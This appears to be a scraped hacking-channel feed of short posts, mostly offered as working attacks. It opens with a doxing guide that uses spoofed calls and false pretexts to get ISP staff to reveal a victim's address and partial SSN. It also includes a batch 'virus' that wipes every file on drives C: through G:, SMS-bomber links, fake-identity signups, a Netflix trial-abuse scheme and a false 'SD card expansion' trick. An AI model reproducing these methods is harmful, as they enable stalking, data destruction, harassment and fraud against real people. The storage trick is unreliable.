How To Dox Anyone - IP / Phone Number Dox Method

*🔥  🔥*

🦑 HOW TO DOX ANYONE ( METHOD 1 - ISP / Phone Number DOX).

1. Obtain the victims IP address, this can be through a method as simple as IP grabbing, or you can search databases if you can't manage to IP grab them. Be careful with databases, some are outdated.

2. Go to whatismyipaddress.com or similar, and enter the victim's IP address.

3. Look for the victim's ISP or Organization.

4. Find the support number to their ISP, and call in. You can either spoof as an inside number to their company, or just use any throwaway phone number. Both methods will be explained below.

*------------------------------------------*

🦑 INSIDE NUMBER METHOD

1. Spoof your phone number to an internal one in the ISP. These can be found by finding all of their support numbers and choosing one to spoof yourself as. Any spoofer can be used, it won't be easy for them to track you with the amount of calls they receive.

2. Call a DIFFERENT support number than the one you are spoofing.

3. When you speak with a representative say the following (adjust wording to your liking), "Hello, this is Mr. Datalinklayer calling from the chat support department. I was recently helping a customer when I was disconnected with the chat, and I wanted to contact them to make sure they got the needed support. Unfortunately, I only have their IP to go off of, is there any way you could help me locate this customer?"

4. After this if you said it in nice tone, without stuttering or being a squeaker, they will gladly help you. If they don't thank them for their time, hang up and call again in 5 minutes.

5. If they do stay, give them the IP and ask for the associated names, phone numbers, and addresses. If you are convincing enough, you can even find the last 4 digits of their SSN.

6. Thank the employee, don't be rude as this could very well get them fired, then hang up. You now have the info you need.

*---------------------------------------*

🦑 THROWAWAY NUMBER METHOD

1. Call the ISP support line, don't use your personal number, just use a random throwaway.

2. Tell them support that you are a private investigator on a cyber crime case (you MUST sound very convincing) and that you need the info to the IP address that you have in order to create a subpoena (pronounced soup-eena)

3. If it doesn't work, hang up, wait 5 minutes, then try again. Eventually you will find a naive employee willing to help.

*------------------------------------------------------*

END NOTES

YOU CAN ALSO DO THIS WITH A PHONE NUMBER, JUST CALL THE PHONE PROVIDER AND FOLLOW THE SAME STEPS, REPLACING THE IP WITH THE PHONE NUMBER.

ALTHOUGH THIS IS HARD TO TRACK, DO NOT USE ON ANYONE FAMOUS OR INVOLVED IN GOVERNMENT WORK, IT WON'T END WELL.






Enjoy!  Follow us for more... 

How to Create a Virtual Credit Card For Netflix Trial In Ewire


1) First, go to the play store and download the Ewire Rupay application.
>https://play.google.com/store/apps/details?id=in.MadMoveGlobal.CashierCard

2)  Sign up with your mobile number on the Ewire mobile app, and you are ready to go.

3)To top-up your virtual card, you need to add money to your card by u sing a different bank account.

4)  Now pay any online bills and payment using this Ewire(cashier) virtual card.

🦑 Features of Ewire Virtual Credit Card :

>Simple and secure transaction
>Compliant domestic and cross-border payments in a single platform
>Provide MasterCard Vcc which is acceptable in most of the merchant website
>Does not require any document submission process
Written by @Solidstone
▁ ▂ ▄ VAMPYR SQUAD 4.0 ▄ ▂ ▁



Enjoy! Follow us for more... 

Main reasons why DotVPN is better than other VPN


1)  Access to all websites, video and audio streaming services, social networks.

2)  Optimized network gives you unlimited speed and bandwidth.

3)  Encryption with 4096 bit key is 2 times greater than banking standards.

4)  Save up to 30% of your traffic with integrated compression.

5)  Simply one tap and connect to VPN in any country.

6)  Privacy and protection of your identity under our IP addresses.

7)  TOR inside gives you an opportunity to surf .onion websites in your favorite browser.

8)  Integrated firewall blocks all inbound connections to your device.

9)  No ads in application.

10)  Permanent Free Plan.

11)  Free VPN account gives you 80% of all features.

11)  24 powerful Data Centers in 12 countries.

source wiki
WRITTEN BY @SOLIDSTONE
▁ ▂ ▄ VAMPYR SQUAD 4.0 ▄ ▂ ▁


Enjoy! Follow us for more... 

BEST FREE VIRTUAL-VALID CREDIT CARD FOR TRANSFERE AND TRIALS


1) https://www.netspend.com/

2) https://link.10besty.com/Payoneer

3) https://www.americanexpress.com/us/payment-solutions/amex-go-virtual-cards/index.html

4) https://link.10besty.com/Neteller

5) https://link.10besty.com/Neteller

6) https://www.walmartmoneycard.com/

7) https://www.netspend.com/prepaid-debit/features/virtual-cards/

8) https://www.freecharge.in/mobile/freecharge-go

9) https://www.kotak.com/en/personal-banking/cards/prepaid-card/kotak-netcard.html

10) https://dhanipay.in/





Enjoy! follow us for more... 

Start Services in Router

Download now

Enjoy! Follow us for more...

Man-in-the-Middle Attack Overview

Download now

Enjoy! Follow us for more...

Download and Install VyOS on a VMware Workstation (Virtual Router)

Download now

Enjoy! Follow us for more...

Bypass Windows 10 Antivirus and Hack Windows 10 from Kali Linux

Download now

Enjoy! Follow us for more...

Various Meterpreter Commands

Download now

Enjoy! Follow us for more...

Installation of Antivirus Bypass Frameworks

Download Now

Enjoy! Follow us for more... 

About Router Pentesting

Download Now

Enjoy! Follow us for more... 

Bypass Windows 10 Defender and Hack Windows 10 from Kali Linux

Download now

Enjoy! Follow us for more... 

Vulnerability Scanning Using Nessus

Download Now

Enjoy! Follow us for more... 

Nessus Installation

Download Now

Enjoy! Follow us for more... 

Ethical Hacking Exam Practice Questions – Part 5 (MCQ)

Download now

Enjoy! Follow us for more... 

Port Scanning in Network Using Nmap

Download Now

Enjoy! Follow us for more... 

What Is Network Pentesting ?

Download Now

Enjoy! Follow us for more... 

Download and Install the JD-Gui Tool

Download Now

Enjoy! Follow us for more... 

Use AES online encryption Complete the Task

Download now

Enjoy! Follow us for more... 

Analyze the Code and Find the Encryption Algorithm

Download now

Enjoy! Follow us for more...

About SQL Injection Attack on Android

Download now

Enjoy! Follow us for more...

Overview of Major Ethical Hacking Exams

Download now.

Enjoy! Follow us for more...

Perform an SQL Injection Attack on Android Using Drozer.

Download now.

Enjoy! Follow us for more...

Download and Install Drozer and Drozer-Agent

Download now

Enjoy! Follow us for more...

Drozer Commands

Download now

Follow us for more...

Ethical Hacking Exam Practice Questions – Part 1 (MCQ).

Download now

Enjoy! Follow us for more...

Ethical Hacking Exam Practice Questions – Part 3 (MCQ).

Download now

Enjoy! Follow us for more...

Ethical Hacking Exam Practice Questions – Part 4 (MCQ)

Download now

Enjoy! Follow us for more...

Download and Install VMware Workstation

Download now

Enjoy! Follow us for more...

Installation of Windows 10 and Kali Linux in VMware Workstation

Download now

Enjoy! Follow us for more...

Download Windows 10 and Kali Linux 2018

Download Now

Enjoy! Follow us for more...

Update and Upgrade the Kali Linux Operating System

Download now

Follow us for more...

Various Components of Network Pentesting

Download now

Enjoy! Follow us for more...

Creating a TCP Server

Download now

Follow us for more...

About Android Log Files

Download now

Enjoy! Follow us for more...

Get a number for your whatsapp Using sonetel

🚩🚩
First goto sonetel.com
Then sign up there.
In there you can see a sign like 👤
Click there
Click team members
Click virtual number
Click manage phone numbers
Click click on a virtual number
Click call forwarding


Then u can see there a option
Send calls to.....
Select there phone number
Below it u have to put ur original number
Then just simply back from it using ⬅️ in the left corner......
Settings saved......



Now open WhatsApp....
Put that virtual number..... And then you have to click call me option.....

You will get a call in your original number...... Write down the code..... Enter it........






Enjoy!  Follow us for more... 

Basic Linux Commands For Beginners!

**

1. ```pwd```

:-To know which directory you are in, Use This CMD

2. ```ls```

:-To know what files are in the directory you are in.  You can see hidden files with ```ls -a```

3. ```cd```

:-Use if you want to go to a directory. If you are in a folder and you want to go to your home folder just type ```cd```

4. ```mkdir```

:-To create a new directory.

5. ```rmdir```

:-To remove a directory.

6. ```rm```

:-To remove a file.

7. ```touch```

:-To create a file.

8. ```man```

:-To know more about a command.

9. ```--help```

:-Same function as 8.

10. ```cp```

:-To copy files.

11. ```mv```

:-To move files and rename files.

12. ```locate```

:-To locate a file.

13. ```echo```

:-Used to move data, especially text into a file.

14. ```cat```

:-To display the contents of a file.

15. ```nano```

:-to create & edit files.

16. ```vi```

:-Same function as 15.

17. ```sudo```

:-To use any command with superuser privilege.

18. ```df```

:-To see the available disk space in each of the partitions in your system.

19. ```du```

:-To know the disk usage of a file in your system.

20. ```tar```

:-To work with tarballs (or files compressed in a tarball archive)

21. ```zip```

:-To compress files into a zip archive.

22. ```unzip```

:-To extract files from a zip archive.

23. ```uname```

:-To show the information about the system your Linux distro is running.

24. ```apt-get```

:-To work with packages in the Linux command line.

25. ```chmod```

:-To make a file executable and to change the permissions granted to it in Linux.

26. ```hostname```

:-To know your name in your host or network.

27. ```ping```

:-To check your connection to a server.

28. ```netcat/nc```

:-To connect to a server.

29. ```nmap```

:-To scan an IP or Port.

30. ```free```

:-To display amount of free and used RAM in the system, also prints the swap space stats.




Enjoy!  Follow us for more... 

How to install Metasploit For Termux

🦑


Metasploit is an advanced hacking tool, which is now available for Termux, let's see how to install Metasploit in Termux

We can install Metasploit in Termux by various methods but i recommend you to install it by one automatic

🦑How to install and use Metasploit in Termux

To install Metasploit in Termux just type below commands

1) cd $HOME

Then type

2) pkg install wget

Then type

3) wget https://Auxilus.github.io/metasploit.sh

Finally type

4) bash metasploit.sh

That's all you have successfully installed Metasploit in Termux
To use Metasploit just type below command

 ./msfconsole




Enjoy!  Follow us for more... 

Log analysis

 :

1) The default log format configuration of Nginx can be found in /etc/nginx/nginx.conf


log_format main '$remote_addr - $remote_user [$time_local] "$request" '
           '$status $body_bytes_sent "$http_referer" '
           '"$http_user_agent" "$http_x_forwarded_for" $request_time $upstream_response_time';


2) Examples of printed logs

39.105.66.117-mp [11/Sep/2019:19:03:01 +0800] "POST /salesplatform-gateway/users HTTP/1.1" 200 575 "-" "Apache-HttpClient/4.5.5 (Java/1.8. 0_161)" "-" 0.040 0.040
39.105.66.117-mp [11/Sep/2019:19:03:08 +0800] "POST /salesplatform-gateway/users HTTP/1.1" 200 575 "-" "Apache-HttpClient/ 4.5.5 (Java/1.8.0_161)" "-" 0.008 0.008

🦑
1) $remote_addr: client IP address

2) $remote_user: used to record the user name of the remote client

3) $time_local: used to record access time and time zone

4) $request: Used to record the request URL and request method

5) $status: response status code

6) $body_bytes_sent: Number of bytes of file body content sent to the client

7) $http_referer: It can record from which link the user came from

8) $http_user_agent: the browser information used by the user

9) $http_x_forwarded_for: can record the client IP, through the proxy server to record the client's IP address

10) $request_time: refers to the time from receiving the first byte of the user request to sending the response data, that is, $request_time includes the time to receive the client request data, the back-end program response time, and the time to send the response data to the client

11) $upstream_response_time: Time to receive response from upstream server




Enjoy! Follow us for more...

Damn Small XSS Scanner

Damn Small XSS Scanner (DSXS) is a fully functional Cross-site scripting vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
> As of optional settings it supports HTTP proxy together with HTTP header values User-Agent, Referer and Cookie.
> termux-linux

🦑 installation & ℝ𝕌ℕ :

1) git clone https://github.com/stamparm/DSXS.git

2) cd DSXS

3)  python3 dsxs.py -h
Damn Small XSS Scanner (DSXS) < 100 LoC (Lines of Code) #v0.3a
 by: Miroslav Stampar (@stamparm)

🦑Usage: dsxs.py options

Options:
  --version          show program's version number and exit
  -h, --help         show this help message and exit
  -u URL, --url=URL  Target URL (e.g. "http://www.target.com/page.htm?id=1")
  --data=DATA        POST data (e.g. "query=test")
  --cookie=COOKIE    HTTP Cookie header value
  --user-agent=UA    HTTP User-Agent header value
  --referer=REFERER  HTTP Referer header value
  --proxy=PROXY      HTTP proxy address (e.g. "http://127.0.0.1:8080")
$ python3 dsxs.py -u "http://testphp.vulnweb.com/search.php?test=query" --data="s
earchFor=foobar"
Damn Small XSS Scanner (DSXS) < 100 LoC (Lines of Code) #v0.3a
 by: Miroslav Stampar (@stamparm)

 scanning GET parameter 'test'
 scanning POST parameter 'searchFor'
 (i) POST parameter 'searchFor' appears to be XSS vulnerable (">.xss.<", outside
 of tags, no filtering)

scan results: possible vulnerabilities found
$ python3 dsxs.py -u "http://public-firing-range.appspot.com/address/location.has
h/replace"
Damn Small XSS Scanner (DSXS) < 100 LoC (Lines of Code) #v0.3a
 by: Miroslav Stampar (@stamparm)

 (i) page itself appears to be XSS vulnerable (DOM)
  (o) ...<script>
      var payload = window.location.hash.substr(1);location.replace(payload);

    </script>...
 (x) no usable GET/POST parameters found

scan results: possible vulnerabilities found





Enjoy! Follow us for more...

GitMiner – Advanced Tool For Mining Github

​​🔰🔰

Mining Github relates to the act of scouring Github using the public search engine for sensitive or useful information in code, commit messages etc based on certain search patterns (which can include file types, target file structures like wp-config.php and languages used). GitMiner is an Advanced search tool for automation in Github, it enables mining Github for useful or potentially dangerous information or for example specific vulnerable or useful WordPress files.




Enjoy! Follow us for more...

SMS BOMBERS WORKING FOR ALL COUNTRIES !

🔰 🔰

1) https://github.com/AvinashReddy3108/YetAnotherSMSBomber

2) https://github.com/Nikait/ni_bomber

3) https://github.com/TheSpeedX/TBomb


4) https://github.com/metachar/Tortuga

5) https://github.com/iMro0t/bomb3r

Enjoy! Follow us for more...

➿➿Termux➿➿

🔰 Dangerous Virus for windows 🔰

🔰  🔰

Hello friends, today I am at your service by teaching you how to create a dangerous virus for Windows with a Notepad brought to you by Hackfreaks.🎈

Note: This virus forces the victim to off disk, so don't click on it at all❌

Well, let's go to the tutorial, first open the Notepad and copy the following code and click .....

ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c: windows *. *
Echo y |  echo a |  Echo y |  del c: *. *
Echo y |  echo a |  Echo y |  del d: *. *
Echo y |  echo a |  Echo y |  del e: *. *
Echo y |  echo a |  Echo y |  del f: *. *
Echo y |  echo a |  Echo y |  del g: *. * *
echo y |  copy *. * C:
echo y |  copy *. * D:
echo y |  copy *. * E:
echo y |  copy *. * F:
echo y |  copy *. * G:

Then select SaveAs and save the file with the bat extension, ie with a name such as okbye.bat



Enjoy! Follow us for more...
 

Hide Your Real IP Address Behind a Proxy


Learn what a proxy is and the risks involved.

You may not know it (and once you do not know it, it may not bother you), but every time you reach out to a website or connect with anyone online, your online connection gives your computer "address" to the site/person you're connecting with.

Why? So that you the other end knows how to send information (a Web page, email, etc.) back to your computer...to you. That address is your public IP address. IP stands for Internet Protocol. Want to see yours right now? Just go here to our home page and it will be there.

Without an IP address, you wouldn't be able to do any Internet/online activity and others online wouldn't be able to reach you. It is how you connect to the world.

Where does your IP address come from?

You can thank your Internet Service Provider (AT&T, Comcast, Verizon, etc.) for your IP address at home, as well as for your Internet connection. Your smart device also uses an IP address when you're browsing the web or using an app.

Most people are completely happy with how all of that works.

But there are few realities about public IP addresses that does bother some people:

Your IP address identifies where you are in the world, sometimes to the street level.It can be used by websites to block you from accessing their content.It ultimately ties your name and home address to your IP address, because someone is paying for an Internet connection at a specific location.

But there are a few ways you can get around those realities, and one them is to use a proxy service or proxy server (people simply say "proxy.")

Proxy means "substitute."

A proxy lets you go online under a different IP address identity.

You don't change your Internet provider; you simple go online and search for "free proxies" or "list of proxies" and you will get several websites that provide lists of free proxies.

It's really that simple to find proxies, just like you order shoes, movies and airline tickets online. However, it isn't so simple to figure out how to use one without some guidance. For more help and information on proxy chat me.

How a proxy operates.

A proxy server is a computer on the web that redirects your web browsing activity. Here's what that means.

Normally, when you type in a website name (Amazon.com or any other), your Internet Service Provider (ISP) makes the request for you and connects you with the destination—and reveals your real IP address, as mentioned before.When you use a proxy your online requests get rerouted.While using a proxy, your Internet request goes from your computer to your ISP as usual, but then gets sent to the proxy server, and then to the website/destination. Along the way, the proxy uses the IP address you chose in your setup, masking your real IP address.

Why you might want to use a proxy.

Here why some people turn to using a proxy—and why you might be interested as well.

A school or local library blocks access to certain websites and a student wants to get around that.You want to look at something online that interests you...but you would prefer it couldn't be traced back to your IP address and your location.You're traveling abroad and the technology set up in the country you're in prevents you from connecting to a website back home.You want to post comments on websites but you do not want your IP address to be identified or your identity tracked down.Your employer blocks access to social media or other sites and you'd like to bypass those restrictions.

Why you might not want to use one

You should keep in mind that your employer, your ISP and other networks might object to your using a proxy. Just because you can do it, doesn't mean you should. And in some cases, websites will blacklist IP addresses they suspect or know are from a proxy.

Not all proxies are alike.

Even though all proxies help you access websites you might not otherwise get to, not all proxies behave the same way. A proxy can fall into one of four categories:

Transparent proxy. It tells websites that it is a proxy server and i

t will pass along your IP address anyway.Anonymous proxy. It will identify itself as a proxy, but it won't pass your IP address to the website.Distorting proxy. It passes along an incorrect IP address for you, while identifying itself as a proxy.High Anonymity proxy. The proxy and your IP address stay a secret. The website just sees a random IP address connecting to it...that isn't yours.

As mentioned before, you can find proxy servers easily for free; but as with any free service, you should be aware of the risks involved, because a free proxy may not be as safe or secure as you hope it would be.



Enjoy! Follow us for more...

Analyze Log Files and Find Secret Code

Download now

Enjoy! Follow us for more...

Download and Install the Dex2jar Tool

Download now

Enjoy! Follow us for more...

Open Log Files Using Logcat

Download now

Enjoy! Follow us for more...

How To Find Windows 10 Product Key Using Command Prompt

🛑
➖➖➖➖➖➖➖➖➖➖➖➖➖
    📌 In this tutorial, we are going to share a working method to find Windows 10 Product Key using Command Prompt. This is an easy process, and you just need to follow some of the easy steps given below.

🔹 Step 1: First of all, Press Windows Key + S to open the Windows search. You need to search for CMD.

🔹Step 2: You need to right-click on the ‘CMD’ and select ‘Run as administrator.’

🔹Step 3: On the command prompt window, you need to type in the given command –

wmic path softwarelicensingservice get OA3xOriginalProductKey

🔹Step 4: The 25- digit product key will appear on the screen. You can copy the code from the Command prompt Window.

✅ That’s it! You are done. This is how you can find your Windows 10 Product Key via Command Prompt.

Share and support us❤️
15 members more for 1k support please🙂
   




Enjoy! Follow us fore. 

How to Make Unlimited Netflix Accounts

🔰🔰

Working in Zambia only or any other country with mobile money virtual VISA

🌀STEPS::

1. *303# and make sure you are using MTN mobile money

2. Make sure you have at least K15 in your account ..😅don't worry no balance deduction will be made 100% guarantee

3. Get a Momo visa on banking services

3. After getting it MTN will send 16 digit cc number  + expiring date and cvv

4. Goto https://www.netflix.com/zm

And input your details if you want fake ones since you will be making multiple accounts 😉


5.  On payment click debit/credit card and input CC info received from MTN  and click start membership...

And complete all Account setups

Congrats you have your free Netflix account🎉

6. K13.27 will be deducted from your account just to verify if the CC is Valid ...wait for 5-10 minutes and it will be reversed to your Account..

7. After the K13.27 is reversed to your account Dial *303# again and goto Bank services - MoMo Visa and Suspend the Virtual Visa..

🔴Note: if you want to make Many Accounts Repeat the Above Steps and Enjoy!...💯






Enjoy! Follow us for more...

Termux MP3 Player (CLI) By SpeedX


This is a Termux MP3 Player (CLI) By SpeedX This is Just A Geeky MP3 Player To Give you an Awesome Feeling Of A Hacker....

TPlay is a Command Lined Based MP3 player To Give You The Feeling Of A Geek...

*Tplay*

$ git clone https://github.com/TheSpeedX/TPlay

$ cd TPlay

$ chmod +x setup.sh

$ ./setup.sh

Now the Script Will Execute..

First Select 1 To Install Dependencies
Then Choose Option 3 Add TPlay to bin

Now You Can Execute TPlay

By just typing tplay anywhere ;-)

Available Commands are:---
play - Plays Paused Music
play <track_number> - Plays The Song With That Track Number ( EX- play 3 )
pause - Pauses Playing Music
next - Plays Next Song
prev - Plays Previous Song
random - Plays Random Song
quit / exit - Stops Playing Music And Exits Player
info - Gets Info of Currently Playing Song
reload - Rescans The Phone Memory For MP3 files and creates A Playlist
ref - Refreshes The Screen
remove <track_number> - Removes Song With Respective Number From PlayList
sort - Sort The List According To Path






Enjoy! Follow us for more....

HOW TO CREATE UNLIMITED PHONE NUMBERS OF ANY COUNTRY

​🔰  🔰



1⃣- ᴄᴏɴɴᴇᴄᴛ ʏᴏᴜʀ ᴠᴘɴ ᴛᴏ ᴛʜᴇ ᴜs ᴜᴜ.

2⃣- ᴏᴘᴇɴ ᴛʜᴇ ᴡᴇʙsɪᴛᴇ https://www.twilio.com/ ɪɴ ʏᴏᴜʀ ʙʀᴏᴡsᴇʀ.

3⃣- ᴄʟɪᴄᴋ ᴏɴ "ɢᴇᴛ ᴀ ғʀᴇᴇ ᴀᴘɪ ᴋᴇʏ".

4⃣- ʀᴇɢɪsᴛᴇʀ ᴜsɪɴɢ ғᴀʟsᴇ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ғʀᴏᴍ ᴛʜᴇ ᴜsᴀ. ᴜᴜ.
ғʀᴏᴍ ʜᴇʀᴇ ( https://www.fakenamegenerator.com/ )
ғᴏʀ ᴇᴍᴀɪʟ
ᴅᴏ ɴᴏᴛ ᴜsᴇ ᴛᴇᴍᴘᴍᴀɪʟ ᴜsᴇ @ ᴏᴜᴛʟᴏᴏᴋ.ᴄᴏᴍ , @ ɢᴍᴀɪʟ.ᴄᴏᴍ ,
@ ʜᴏᴛᴍᴀɪʟ.ᴄᴏᴍ , @ ʏᴀʜᴏᴏ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ 100% sᴜᴄᴄᴇss. (@ ᴏᴜᴛʟᴏᴏᴋ.ᴄᴏᴍ ʀᴇᴄᴏᴍᴍᴇɴᴅᴇᴅ)

5⃣- ᴄʜᴏᴏsᴇ "ᴊᴀᴠᴀ" ɪɴ ᴛʜᴇ ʟᴀɴɢᴜᴀɢᴇ.

6⃣- ɪɴ ᴛʜᴇ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ ᴏғ ᴛʜᴇ ᴍᴏʙɪʟᴇ ɴᴜᴍʙᴇʀ, ᴜsᴇ ᴛʜᴇ ᴠɪʀᴛᴜᴀʟ ᴛᴇxᴛɴᴏᴡ ɴᴜᴍʙᴇʀ ᴏʀ ᴜsᴇ ᴛʜᴇ sᴇᴄᴏɴᴅ ʟɪɴᴇ ғᴏʀ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ.

7⃣- ᴀғᴛᴇʀ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ, ᴛʜᴇ ᴍᴇɴᴜ ᴏғ ʏᴏᴜʀ ᴘʀᴏᴊᴇᴄᴛ ᴡɪʟʟ ᴀᴘᴘᴇᴀʀ.

8⃣- ᴄʜᴏᴏsᴇ ᴛᴇᴍᴘʟᴀᴛᴇs -> ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀs.

9⃣- ɢɪᴠᴇ ᴀɴʏ ɴᴀᴍᴇ ᴛᴏ ʏᴏᴜʀ ᴘʀᴏᴊᴇᴄᴛ ᴀɴᴅ sᴋɪᴘ ᴏᴛʜᴇʀ sᴛᴇᴘs.

🔟- ᴏɴᴄᴇ ᴛʜᴇ ᴘʀᴏᴊᴇᴄᴛ ɪs ᴄʀᴇᴀᴛᴇᴅ, ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀs.

1⃣1⃣- sᴇʟᴇᴄᴛ ᴛʜᴇ ᴄᴏᴜɴᴛʀʏ ᴀɴᴅ ᴛʜᴇɴ sᴇᴀʀᴄʜ.

1⃣2⃣- sᴇʟᴇᴄᴛ ᴀɴʏ ɴᴜᴍʙᴇʀ ᴏɴ ᴛʜᴇ sᴄʀᴇᴇɴ ᴀɴᴅ ᴄʟɪᴄᴋ "ʙᴜʏ" (ᴅᴏɴ'ᴛ ᴡᴏʀʀʏ, ᴛʜᴇʀᴇ ɪs ɴᴏ ᴘᴀʏᴍᴇɴᴛ ᴍᴇᴛʜᴏᴅ).

1⃣3⃣- ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ ᴄᴏɴғɪɢᴜʀᴀᴛɪᴏɴ ɴᴜᴍʙᴇʀ.

1⃣4⃣- ᴅᴏɴᴇ, ᴊᴜsᴛ ᴄʀᴇᴀᴛᴇ ᴀ ᴠɪʀᴛᴜᴀʟ ɴᴜᴍʙᴇʀ ᴡɪᴛʜ ᴛʜᴇ ᴄᴀʟʟs, sᴍs, ᴍᴍs ғᴜɴᴄᴛɪᴏɴ.

1⃣5⃣- ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴀɴᴏᴛʜᴇʀ ɴᴜᴍʙᴇʀ, ʀᴇᴘᴇᴀᴛ ᴛʜᴇ ᴘʀᴇᴠɪᴏᴜs ɴᴜᴍʙᴇʀ ᴀɴᴅ ʙᴜʏ ᴀɴᴏᴛʜᴇʀ ɴᴜᴍʙᴇʀ.



Enjoy! Follow us for more...

Simple TRICK on how to Increase MEMORY CARD storage of 2GB To 128GB this trick works

 (100% PERFECT)


This is a simple trick on how to increase SD storage of 2GB To 128GB this trick works 100%.

Required things:

One smart phone with android version, one memory card 2GB.

Open file manager and Check the details of SD card, see the storage 1.8GB

After that you go on play store and download app. ES explorer

After installing the App,open this app go to internal storage then after open SD card you will see phone memory then after you open android data, now create a new folder name ‘det file'' and save it. Then open this folder by text ‘ES note ditor'’ now you see blank page, After this blank page, now edit this page write only ‘Make it large''

Now you calculate how many MB in 128GB

128GB= 128×1024=131072MB

Now open that page where you typed ‘make it large'' write there ‘Make it large 131072MB’ and save it. After this process you restart your phone.

Finally you'll see your file manager details of SD card 124.97GB.

Make sure you don't miss any step.





Enjoy! Follow us for more...

Encryption Process in Android

Download now

Follow us for more...

Ethical Hacking Exam Practice Questions – Part 2 (MCQ).

Download now

Follow us for more...

Start Android Phone in Android Studio.mp4

Download now

Follow us for more...

Scope of Android Pentesting.mp4

Download now

Follow us for more...

How to use a solderless breadboard.mp4

  Download now  Enjoy! Follow us for more...